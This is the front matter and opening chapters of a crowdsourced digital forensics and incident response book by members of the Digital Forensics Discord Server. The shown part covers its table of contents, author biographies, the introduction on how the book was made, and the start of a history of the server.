SlideShare a Scribd company logo
DFIR
The Hitchhiker’s Guide to DFIR: Experiences
From Beginners and Experts
A crowdsourced Digital Forensics and Incident Response
(DFIR) book by the members of the Digital Forensics
Discord Server
Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John
Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland,
Jason Wilkins and Mark Berger
This book is for sale at
http://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
This version was published on 2022-11-28
ISBN 979-8-9863359-0-2
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing
process. Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and
many iterations to get reader feedback, pivot until you have the right book and build traction once
you do.
© 2022 Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers,
Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger
This book is dedicated to all the practitioners and professionals in the niche of DFIR. It is for all
those, beginners and experts alike, who spend sleepless nights expanding their horizons of
knowledge in efforts to bring a change, small or big.
Happy Sleuthing! :)
Contents
Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Contributors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Chapter 0 - Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Purpose of This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Community Participation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Chapter 1 - History of the Digital Forensics Discord Server . . . . . . . . . . . . . . . . . . . . 14
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Beginnings in IRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Move to Discord . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server . . . . . . . . . . . . . 17
Member Growth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Hosting the 2020 Magnet Virtual Summit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Community Engagement Within the Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Impact on the DFIR community . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Law Enforcement Personnel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Forensic 4:cast Awards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Future . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Chapter 2 - Basic Malware Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Basic Malware Analysis Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Basic Malware Analysis Walkthrough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Analysis Wrap-Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Chapter 3 - Password Cracking for Beginners . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Disclaimer & Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Password Hashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Useful Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
Hash Extraction Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
CONTENTS
Hash Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Attacking the Hash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Installing Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
“Brute-Forcing” with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Hashcat’s Potfile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Dictionary (Wordlist) Attack with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Dictionary + Rules with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Robust Encryption Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Complex Password Testing with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Searching a Dictionary for a Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Generating Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Paring Down Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Additional Resources and Advanced Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Chapter 4 - Large Scale Android Application Analysis . . . . . . . . . . . . . . . . . . . . . . . 88
Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Part 1 - Automated Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Part 2 - Manual Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Problem of Scale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Part 3 - Using Autopsy, Jadx, and Python to Scrap and Parse Android Applications at Scale 103
Chapter 5 - De-Obfuscating PowerShell Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
What Are We Dealing With? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Stigma of Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Word of Caution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
Base64 Encoded Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Base64 Inline Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
GZip Compression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Invoke Operator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
String Reversing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Replace Chaining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
ASCII Translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Wrapping Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Chapter 6 - Gamification of DFIR: Playing CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
What is a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Why am I qualified to talk about CTFs? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Types of CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Evidence Aplenty . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
CONTENTS
Who’s Hosting? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Why Play a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Toss a Coin in the Tip Jar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Takeaways . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Chapter 7 - The Law Enforcement Digital Forensics Laboratory . . . . . . . . . . . . . . . . . 146
Setting Up and Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Executive Cooperation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Physical Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Selecting Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Certification and Training . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151
Accreditation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
Chapter 8 - Artifacts as Evidence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Forensic Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Types of Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
What is Parsing? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Artifact-Evidence Relation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
Chapter 9 - Forensic imaging in a nutshell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
What is a disk image? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Creating a disk image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Memory forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Next Steps and Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Chapter 10 - Linux and Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
What is Linux? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Why Linux for Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Choosing Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
Learning Linux Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Linux Forensics in Action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Closing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage . . . . . . . . . . . . . . . . . . . . 210
What is triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
What should be included in a triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Forensic triage of one or a limited amount of hosts . . . . . . . . . . . . . . . . . . . . . . . . 211
Scaling up to a medium-sized subnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Scaling up to an entire network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Other tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Practicing triage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Contributions and sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
CONTENTS
Chapter 12 - Data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Logical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Physical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
How to approach a data recovery case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220
Imaging of unstable HDDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Flash drive data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245
Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Reporting Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Changelog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
Authors
Andrew Rathbun
Andrew Rathbun is a DFIR professional with multiple years of experience in law enforcement and
the private sector. Andrew currently works at Kroll as a Vice President in Cyber Risk. Andrew is
involved in multiple community projects, including but not limited to the Digital Forensics Discord
Server¹, AboutDFIR², and multiple GitHub repositories³. You can find him on the DFIR discord⁴.
ApexPredator
After many years at the top of the Systems Administration food chain, the ApexPredator switched
to the Cybersecurity food chain. The ApexPredator is working to the top while possessing an MS
in Cybersecurity and Information Assurance degree and numerous certifications, including OSCE3
(OSWE, OSEP, OSED), OSCP, OSWP, GREM, GXPN, GPEN, GWAPT, GSLC, GCIA, GCIH and
GSEC. Always hunting for more prey, it spends free time playing with malware analysis and exploit
development.
Barry Grundy
A U.S. Marine Corps veteran, Barry Grundy has been working in the field of digital forensics
since the mid-1990s. Starting at the Ohio Attorney General’s office as a criminal investigator, and
eventually joining U.S. Federal Law Enforcement as a digital forensics analyst and computer crimes
investigator in 2001. He holds a Bachelor of Science in Forensic Science from Ohio University, and
A Master’s Degree in Forensic Computing and Cybercrime Investigations from University College
Dublin.
Barry is the author and maintainer of the Law Enforcement and Forensic Examiner’s Introduction
to Linux (LinuxLEO⁵). This practical beginner’s guide to Linux as a digital forensics platform has
been available for over 20 years and has been used by a number of academic institutions and
law enforcement agencies around the world to introduce students of DFIR to Linux. Teaching,
particularly Linux forensics and open source DFIR tools, is his passion.
¹https://www.linkedin.com/company/digital-forensics-discord-server/
²https://aboutdfir.com/
³https://github.com/stars/AndrewRathbun/lists/my-projects
⁴http://discordapp.com/users/223211621185617920
⁵https://linuxleo.com
Authors 2
Guus Beckers
A lifelong IT aficionado, Guus Beckers (1990), completed the Network Forensic Research track
at Zuyd University of Applied Sciences as part of his Bachelor’s degree. In 2016, he attained his
university Master’s degree at Maastricht University by completing the Forensics, Criminology and
Law master’s program. Guus currently works as a security consultant at Secura, leading the forensic
team and performing penetration testing.
Jason Wilkins
After serving in the US Navy for five years, Jason Wilkins began a career in firefighting and
emergency medicine. While serving the community in that capacity for fourteen years he obtained
associates degrees in criminal justice and computer networking from Iowa Central Community
College online. He left the fire department in 2014 to pursue a network analyst position working
for a global tire manufacturer. Disillusioned by a lack of mission and purpose, he returned to public
safety in 2019 and began working as a crime & intelligence analyst for the local police department. It
was there that he developed the agency’s first digital forensics lab and started the N00B2PR04N6 blog.
In 2020 he was nominated as Newcomer of the Year in the Digital Forensics 4:Cast awards and has
spoken at both the SANS Digital Forensics and Magnet Forensics Summits. He currently works as an
overseas contractor teaching digital forensics and is also an adjunct instructor for digital forensics
and incident response at Iowa Central Community College.
John Haynes
John Haynes works in law enforcement with a focus on digital forensics. John holds several
digital forensics certs including Cellebrite Certified Mobile Examiner (CCME) and Magnet Certified
Forensics Examiner (MCFE) and also holds the networking Cisco Certified Network Associate
(CCNA) certification. Having only been active in digital forensics since 2020, his background as
a curious nerd has served him well as he has just started exploring what digital forensics has to
offer.
John has taken a keen interest in password cracking after being introduced to the basics of Hashcat
at the NCFI. This started the foundation for the password-cracking chapter in this book. You can
find a few of his videos on password cracking on YouTube⁶ or find him learning what he can on the
DFIR Discord⁷.
Kevin Pagano
Kevin Pagano is a digital forensics analyst, researcher, blogger and contributor to the open-source
community. He holds a Bachelor of Science in Computer Forensics from Bloomsburg University
⁶https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg
⁷http://discordapp.com/users/167135713006059520
Authors 3
of Pennsylvania and a Graduate Certificate in Digital Forensics from Champlain College. Kevin
is a member of the GIAC Advisory Board and holds several industry certifications, including the
GIAC Advanced Smartphone Forensics (GASF), GIAC Certified Forensic Examiner (GCFE), and
GIAC Battlefield Forensics and Acquisition (GBFA), and the Certified Cellebrite Mobile Examiner
(CCME) among others.
Kevin is the creator of the Forensics StartMe⁸ page and regularly shares his research on his blog⁹. He
is a published author with multiple peer-reviewed papers accepted through DFIR Review¹⁰. Kevin
also contributes to multiple open-source projects, including but not limited to ALEAPP¹¹, iLEAPP¹²,
RLEAPP¹³, CLEAPP¹⁴ and KAPE¹⁵.
Kevin is a regular competitor in the digital forensics CTF circuit. He has won First Place in the
Magnet User Summit DFIR CTF 2019, the Magnet Virtual Summit DFIR CTF 2021, the Magnet
User Summit DFIR CTF 2022, the Magnet Weekly CTF 2020, the Wi-Fighter Challenge v3 CTF, the
Belkasoft Europe 2021 CTF, and the BloomCON CTF in 2017, 2019, 2021 and 2022. He additionally is
a SANS DFIR NetWars Champion and NetWars Tournament of Champions winner and has earned
multiple Lethal Forensicator coins. Kevin is a 4-time Hacking Exposed Computer Forensic (HECF)
Blog Sunday Funday Winner.
In his spare time, Kevin likes to drink beers and design DFIR-themed designs for stickers, clothing,
and other swag. You can find him lurking on Twitter¹⁶ and on the DFIR Discord¹⁷.
Nisarg Suthar
Nisarg Suthar is a lifelong student and learner of DFIR. He is an aspiring digital forensic analyst
with high levels of curiosity about how things work the way that they do. He has experience with
malware analysis, reverse engineering, and forensics.
Nisarg is an independent researcher, a blue teamer, CTF player, and a blogger¹⁸. He likes to read
material in DFIR; old and new, complete investigations on platforms like CyberDefenders and BTLO,
and network with other forensicators to learn and grow mutually.
He is also the developer of his most recent open-source project Veritas¹⁹, a validation purpose hex
viewer for the people in DFIR. He is a big fan of all things FOSS.
Nisarg started tinkering with the disassembly of machine code, computer data, and reverse
engineering when he came across the world of modding, emulation, and ROM hacking. Making
his favorite games do what he wanted was a full-time hobby of writing code and stories.
⁸https://start.me/p/q6mw4Q/forensics
⁹https://www.stark4n6.com/
¹⁰https://dfir.pubpub.org/user/kevin-pagano
¹¹https://github.com/abrignoni/ALEAPP
¹²https://github.com/abrignoni/iLEAPP
¹³https://github.com/abrignoni/RLEAPP
¹⁴https://github.com/markmckinnon/cLeapp
¹⁵https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape
¹⁶https://twitter.com/kevinpagano3
¹⁷http://discordapp.com/users/597827073846935564
¹⁸https://sutharnisarg.medium.com/
¹⁹https://github.com/Nisarg12/Veritas
Authors 4
In his spare time, Nisarg likes to play and learn chess obsessively.
s3raph
Breaker of things (mostly things that they shouldn’t break). Writer of broken code GitHub²⁰.
s3raph has worked in DFIR, Threat Hunting, Penetration Testing, and Cyber Defense and still
somehow has a job in this field.
Do You Want to Know More?²¹
Tristram
An avid blue team leader helping to secure the healthcare industry. Despite being blue team focused,
Tristram brings the enemy mindset to the table through various offensive skillsets to identify gaps
and validate existing controls.
²⁰https://github.com/s3raph-x00
²¹https://www.s3raph.com/
Contributors
Thank You,
• Holly Kennedy²² | Twitter²³ - For proofreading, editing, and making corrections!
• Oaker Min²⁴ | Blog²⁵ | Twitter²⁶ - For helping with the dead link checker²⁷!
• Klavdii²⁸ - For providing multiple²⁹ grammatical, spelling, and punctionation fixes as they were
reading the book.
• …and all other contributors³⁰ to the GitHub repository!
Every effort has been made in the preparation of this book to ensure the accuracy of the information
presented. However, the information contained in this book is sold without warranty, either express
or implied. Neither the authors nor contributors will be held liable for any damages caused or alleged
to have been caused directly or indirectly by this book.
²²https://github.com/hollykennedy
²³https://twitter.com/hollykennedy4n6
²⁴https://github.com/brootware
²⁵https://brootware.github.io/
²⁶https://twitter.com/brootware/
²⁷https://github.com/Digital-Forensics-Discord-Server/CrowdsourcedDFIRBook/issues/59
²⁸https://github.com/lordicode
²⁹https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/pulls?q=is%
3Apr+author%3Alordicode+is%3Aclosed
³⁰https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/graphs/
contributors
Chapter 0 - Introduction
By Andrew Rathbun³¹ | Twitter³² | Discord³³
Welcome to the first crowdsourced digital forensics and incident response (DFIR) book! To my
knowledge, this book is a first of its kind and hopefully not the last of its kind. To be very clear,
this is not your traditional DFIR book. It’s also not meant to be, and that’s okay. I came up with the
idea of the project, which ultimately became the book you are reading right now when I stumbled
upon a website called Leanpub. Upon further research, I learned that books could be written on
GitHub, a platform that has become a large part of my life since May 15. 2020 when I completed
my first commit³⁴! As the Administrator of the Digital Forensics Discord Server, a community for
which I am very fond and proud of, I felt combining the idea of writing a book with the members
of the community that has given so much to me was a dream come true. This book is a grassroots
effort from people who, to my knowledge, have no experience doing anything they’re about to do in
the chapters that succeed this Introduction chapter, and that’s okay. This book isn’t perfect, and it
doesn’t need to be. This book is documenting multiple people stepping outside of their shells, putting
themselves out there, to share the knowledge they’ve gained through the lens they’ve been granted
in their life with hopes to benefit the greater DFIR community. Additionally, I hope this book will
inspire others to step outside their comfort zone and recognize that anyone can share knowledge,
thus leaving the world a better place than what you found.
Before getting into the chapters this book offers, I want to cover the mantra behind this book for the
reader to consider as they make their way through.
³¹https://github.com/AndrewRathbun
³²https://twitter.com/bunsofwrath12
³³http://discordapp.com/users/223211621185617920
³⁴https://github.com/EricZimmerman/KapeFiles/commit/972774117b42e6fafbd06fd9b80d29e9f1ca629a
Chapter 0 - Introduction 7
Purpose of This Book
This book is purely a proof of concept that members of the Digital Forensics Discord Server
undertook to show that a DFIR book can be:
Crowdsourced
I love collaborating with people. I enjoy it when I can find people with the same mindset who “get
it” and all they want to do is move the ball forward on something greater than themselves. Everyone
contributing to this book “gets it”, but that doesn’t mean if you’re reading this right now and haven’t
contributed to it, you do not “get it”. I think it means you haven’t found something that’s resonated
with you yet, or you’re just not at a point in your career or, more importantly, your life to where
you’re able to give back through the various methods of giving back to the DFIR community, and
that’s okay. Ultimately, this book is greater than the sum of its parts, and I’m thrilled to help provide
the opportunity for myself and others to collaborate with other members of the Digital Forensics
Discord Server to create something genuinely community-driven from idea to published book.
Open source
Since my first commit on GitHub in May 2020, I’ve been hooked on contributing to open-source
projects. The ability for the community to see the process unfold from A-Z, including but not limited
to the chapters being written, edited, and finalized for publication, is something I don’t think we’ve
seen yet, and I hope we see more of once this book is published and freely available for anyone to
consume.
Self-published
Self-publishing allows for as much control as possible for the content creators. Being able to self-
publish on Leanpub enables the content creators to modify the content at a moment’s notice without
the red tape involved when dealing with a publisher. As a result, this book can be updated at any
time with additional content until the authors deem the book to be complete, and thus a sequel
would be necessary.
Chapter 0 - Introduction 8
Created using GitHub and Markua (modified version of
Markdown)
This goes along with the open-source above. GitHub is a fantastic platform by which to contribute
to open source projects. Markdown is commonly used on GitHub and Leanpub utilized a Leanpub-
flavored version of Markdown called Markua³⁵. Having gained a lot of experience with Markdown
in my travels in various GitHub repos, the thought of authoring a book using Markdown was very
appealing.
Accessible
This particular book will be freely available on Leanpub here³⁶. It will never cost you anything. Share
it far and wide!
Considering all the above, a legitimate DFIR resource
Frankly, this may not be at the level of a college textbook, but it’s also not meant to be. Again,
this project is intended to provide a platform for previously unknown contributors in the DFIR
community to provide the knowledge they’ve gained through research, experience, or otherwise.
When one is passionate enough about a subject to where they’d volunteer to write a chapter for a
book like this, enabling that person to spread their wings and put themselves out there for others
to benefit from is an honor. Any errata in the chapters of this book will be addressed as they are
identified, and since we control the publishing tempo, we (or you) can update the book at any time.
³⁵http://markua.com/
³⁶https://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts
Chapter 0 - Introduction 9
Community Participation
One important aspect of creating this book was involving the community in deciding the book title³⁷
and the book cover³⁸.
Book Title
Originally, this book was called CrowdsourcedDFIRBook as a working title. Multiple polls on Google
Forms³⁹ were created with the following results:
Round 1
³⁷https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/4
³⁸https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues/12
³⁹https://www.google.com/forms
Chapter 0 - Introduction 10
Round 2
Book Cover
Originally, the book had no cover concept planned. As we got closer to the date of publishing the
initial version of the book, we had discovered Canva⁴⁰ allowed us to work up respectable book cover
candidates. Naturally, the book cover was put to a vote that would be decided by the community.
The first voting round contained 17 book cover candidates created using Canva.
Round 1
The following book covers were available as options during the first round of voting:
⁴⁰https://www.canva.com/
Chapter 0 - Introduction 11
The final results for Round 1 were as follows:
Chapter 0 - Introduction 12
Round 2
The following book covers were decided as the top three in Round 1:
The final results for Round 2 were as follows:
Therefore, the book cover was chosen by the community for a book that was made by the community
and for the community.
Chapter 0 - Introduction 13
Final Thoughts
I don’t think any of the co-authors listed on the cover of this book ever thought they would be
published authors. I can certainly say that is the case for myself. This project proved that the barrier
to doing something as complicated as writing a book isn’t as complex as it could be, primarily thanks
to Leanpub. For all we know, the next prominent name in the DFIR world may have gotten their
start from volunteering a simple chapter to this book which sparked an interest in continuing the
path of knowledge sharing, content development, and overall DFIR community betterment. Only
time will tell! Either way, I’m proud of those who stepped up to do something uncomfortable,
something that requires effort and follow-through, and something they can ultimately be proud
of accomplishing when all is said and done. Ultimately, the authors win, the other contributors win,
and most importantly, the community wins!
Enjoy the book!
Chapter 1 - History of the Digital
Forensics Discord Server
By Andrew Rathbun⁴¹ | Twitter⁴² | Discord⁴³
Special thanks to Kevin Pagano for creating the Digital Forensics Discord Server logo!
Introduction
I felt it was prudent to choose this topic for this project because very few others could provide as
in-depth an account of the history of the Digital Forensics Discord Server. Having been a part of the
server since day one and actively monitoring it every day since, I felt like this was something that
needed to be immortalized before too much more time passes. As the server continues to grow and
life forges on, much like a DVR or event log, memories are overwritten with more current memories.
I very likely would not be able to write as detailed an account of this server’s history 5 years from
now as I can today. If anything, documenting this history now creates a starting point to build upon
over time.
⁴¹https://github.com/AndrewRathbun
⁴²https://twitter.com/bunsofwrath12
⁴³http://discordapp.com/users/223211621185617920
Chapter 1 - History of the Digital Forensics Discord Server 15
Beginnings in IRC
Long before the Digital Forensics Discord Server came to be, there existed a channel on an IRC⁴⁴
network called freenode⁴⁵. The channel was called #mobileforensics. This channel had its humble
beginnings on a Google Group run by Bob Elder of TeelTech⁴⁶, called the Physical and RAW Mobile
Forensics Group⁴⁷, which still exists today. To gain access to this Google Group, one had to have
attended a TeelTech training in the past. It was and continues to be a phenomenal resource for those
in Law Enforcement trying to navigate the waters of mobile forensic acquisitions.
In February 2016, I attended TeelTech’s JTAG/Chip-Off class taught by Mike Boettcher and gained
an invite to the Physical and RAW Mobile Forensics Group. I actively participated in the group to
the extent my knowledge and curiosity enabled me. Make no mistake, almost every other active
poster in that group was more experienced or knowledgeable than I. I thought there was no better
place or group of people to immerse myself in if I wanted to be the best version of myself.
On August 23, 2016, a user by the name of tupperwarez informed the group that they were starting
an IRC channel called #mobileforensics in an effort to “exchange ideas & have live discussions”.
I have been using forums for all of my internet life up until this point, and I think subconsciously I
was ready for something more. This was it! I also knew that IRC was a longstanding tradition, but
I had never dabbled with it and only had previous experience with messaging clients such as AOL
Instant Messenger (AIM)⁴⁸ and MSN Messenger⁴⁹ at the time. Thirteen minutes after the post by
tupperwarez went out, I was the first to respond to the thread that I had joined.
